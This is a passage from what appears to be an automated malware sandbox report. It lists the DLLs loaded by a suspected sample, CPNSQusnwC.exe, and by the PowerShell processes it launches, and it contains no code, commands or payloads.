                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeSection loaded: dlnashext.dllJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeSection loaded: wpdshext.dllJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
